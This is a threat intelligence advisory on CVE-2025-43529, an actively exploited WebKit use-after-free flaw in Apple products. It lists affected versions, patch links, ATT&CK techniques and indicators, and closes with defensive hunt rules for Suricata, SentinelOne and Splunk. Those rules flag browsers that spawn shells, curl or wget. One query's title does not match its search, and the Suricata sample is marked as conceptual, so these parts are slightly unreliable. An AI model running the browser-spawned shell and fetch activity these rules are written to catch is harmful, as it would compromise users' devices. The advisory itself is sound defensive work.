Targeted Sectors

·         Apple Users

Other potential targets

·         Government facilities

·         Associated critical infrastructure

Potential Affected Countries

·         Global

BLUF

A use-after-free vulnerability exists in the WebKit component of multiple Apple products, which allows an attacker to execute arbitrary code by tricking a user into processing maliciously crafted web content. The flaw is actively exploited as a zero-day and requires immediate patching.

Date of first reported activity

·         December 12, 2025

Date of last reported activity update

·         December 15, 2025

CVE-2025-43529

A use-after-free vulnerability in WebKit

CVSS:3.1

(9.8) AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Nessus ID(s)

·         278573

·         278572

·         278570

Is this on the KEV list?

Yes

CISA patch by date

January 5, 2026

Patching/Mitigation Data

Patch Release Date

December 12, 2025

URL to patch

·         hxxps://support.apple.com/en-us/125884

Impacted versions

·         iOS and iPadOS 26.2, iOS and iPadOS 18.7.3

·         macOS Tahoe 26.2, Safari 26.2

·         tvOS 26.2, watchOS 26.2, and visionOS 26.2

APT Names

·         No APT groups have been named at this time

Associated Criminal Organization Names

No specific criminal organizations have been named at this time

Delivery Method

·         Exploitation occurs when a victim processes maliciously crafted web content, typically by visiting a malicious website.

IOCs

·         Abnormal network traffic originating from browser processes (Safari, Chrome).

·         Unusual process creation events, such as a web browser spawning unexpected child processes.

·         Anomalous network connections to unknown or suspicious domains/IP addresses.

Tools

·         Potential spyware tools but it is unreported at this time

TTPs

·         T1189 - Drive-by Compromise

·         T1204.001 - User Execution: Malicious Link

·         T1071.001 - Application Layer Protocol: Web Protocols

·         T1070.004 - File and Directory Discovery/Modification

·         T1059.004 - Command and Scripting Interpreter: JavaScript/Jscript

·         TA0004 - Privilege Escalation

·         T1105 - Ingress Tool Transfer

·         TA0011 - Command and Control

Malware names

No malware has been named at this time

Malware Sample

No malware has been named at this time

Email Samples

Nessus ID/Potential Suricata/SentinelOne/Splunk rules: Specific vendor IDs or rules were not specified in the search results.

Suggested Rules / potential hunts

These are indicator rules/ hunt suggestions. They are likely to be noisy for best results consider using a data model to perform historical studies for anomalous behavior.

Suricata

Anomalous HTTP Traffic Headers: Look for unusual or malformed HTTP headers that might be part of an exploit delivery mechanism, though this requires high-fidelity packet analysis.

Monitor for C2/Spyware Activity: Generic detection for known spyware C2 frameworks, as this vulnerability is linked to commercial spyware vendors.

Example (Conceptual, relies on specific feed signatures):

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Suspected Commercial Spyware C2 Traffic"; flow:established; content:"|specific_spyware_indicator|"; classtype:trojan-activity; sid:9999999; rev:1;

SentinelOne

Suspicious Child Process Creation from a Browser: Hunt for instances where a web browser process

EventType = "Process Creation" AND ParentProcessName Contains "Safari" OR ParentProcessName Contains "WebKit" OR ParentProcessName Contains "Chrome" AND ProcessName In ("sh", "bash", "zsh", "python", "perl", "curl", "wget")

Unusual Outbound Network Connection after Web Access

ProcessName Contains "WebKit" AND RemoteAddress NOT In ("*apple.com*", "*google.com*", "*your_internal_domains*") AND RemotePort NOT In (80, 443)

Memory Corruption Indicators (Advanced): While difficult to write generic rules for, monitoring for process crashes or restarts of browser components in system logs can sometimes indicate a failed or successful memory manipulation attempt.

Splunk

Browser Spawning Shell Process

index=your_edr_index OR index=your_sysmon_index ParentProcessName IN ("*Safari*", "*WebKit*", "*Chrome*", "*Firefox*") ProcessName IN ("sh", "bash", "zsh", "python", "perl", "cmd.exe", "powershell.exe") | table _time, host, ParentProcessName, ProcessName, CommandLine

High Volume of Outbound Connections to Rare Domains

index=your_system_logs source=*crash.log OR source=*error.log "WebKit" OR "Safari" OR "Chrome" "fault" OR "exception" OR "crash"

References

Tenable

hxxps://www.tenable.com/cve/CVE-2025-43529/plugins

Support Apple

hxxps://support.apple.com/en-us/125884

CISA

hxxps://www.cisa.gov/known-exploited-vulnerabilities-catalog#:~:text=CVE-2025-43529

Security Week

hxxps://www.securityweek.com/apple-patches-two-zero-days-tied-to-mysterious-exploited-chrome-flaw

Dark Reading

hxxps://www.darkreading.com/vulnerabilities-threats/apple-patches-more-zero-days-sophisticated-attack